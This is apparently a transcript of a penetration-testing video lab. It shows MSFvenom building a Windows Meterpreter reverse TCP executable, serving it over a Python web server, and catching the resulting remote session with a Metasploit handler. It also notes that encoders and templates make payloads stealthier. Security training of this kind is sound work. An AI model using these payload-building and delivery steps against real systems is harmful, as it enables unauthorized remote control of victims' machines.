So prior to MSFvenom, there were MSF Payload and MSF Encoder that would help us to compose more stealthy payloads. Now, I want to start it like a fairy tale or a story, but it wasn't really that far back. The way I remember it, it was 2015 when MSFvenom replaced both MSF Payload and MSF Encode. Now, I really like this tool. As it's defined in its description, a Metasploit standalone payload generator. So I think the guys from the Metasploit team deserve applause for this brilliant tool. At first glance, you might think, it's a simple tool. What can it do? And yes, the power is derived from its simplicity and ease of use. However, it is very comprehensive when you examine its payloads, encoders, and other capabilities. So let's have a look at how to use this tool. Open up a terminal tab and simply type MSFvenom help to discover the tool. The help screen is pretty well defined and the parameters are well explained, so make sure that you become well acquainted with it. Now you can define many properties for your payloads. You can add NOP-sleds, avoid bad chars, even add custom codes to your payloads. Also, MSFvenom allows you to encode the payload and even lets you use an executable template to be stealthier. MSFvenom supports all Metasploit payloads. So to list the available payloads, type MSFvenom L payloads. To list encoders, just type in MSFvenom L encoders. And you can do this for any of the architectures supported. For platforms, and for formats. With MSFvenom, you have many ways to create a payload file. C, Python, ASPX, and many other types. So you can use any payload with almost all options inside MSFvenom. So let's type MSFvenom P, then the payload name, and to list the options for a payload, add List Options. And here we have the description of Interpreter Reverse TCP payload. So while creating a payload-contained file, you can use all these options to build a more specific file. So now let's create a file from the very beginning. MSFvenom P, then the payload, Windows x64, Interpreter, Reverse TCP, and payload options, lhost equals 10.10.2.11, lport equals 4441, platform Windows for Windows systems, A x64 for 64-bit architectures, FEXE for Windows executables, and finally, O for the output file name, normal.exe. Okay, so my executable is now saved in the malware directory. And I'll change the directory to desktop malware. ls normal.exe file resides here. So file normal.exe. And see there, you can tell that the file is a Windows executable. So now, go to Metasploit and start a handler. Use exploit multi-handler. Set payload to Windows x64 Interpreter Reverse TCP. Set lhost to 10.10.2.11. Set lport to 4441. and show the options again, just to double check. Right, so everything looks good. Exploit J, and okay, so the handler started. So now I'm going to open up a new tab and start a Python server from the malware directory. Python M simple HTTP server on port 8000. Then I'm going to open Metasploit Framework. Start Internet Explorer and go to http://10.10.2.11:8000. So this address will show the files in the malware directory on Kali. Now, click the normal.exe to download and save it to the desktop. Okay, so let me just open MSF console. For Metasploit 3, run normal.exe by double-clicking on it. On the left pane, you can see the session open. So type sessions, and this is it on port 4441. So interact with session 1, get UID, sysinfo. And there you have it, the basic usage of MSFvenom. So you use a payload to generate a vulnerable file. Then you deliver this file to the target, and then make the target run this file to connect back to the handler running on our Kali. So what I'll do is apply this logic in the next few videos as well. So strap on your seatbelt. We're going to go for a ride.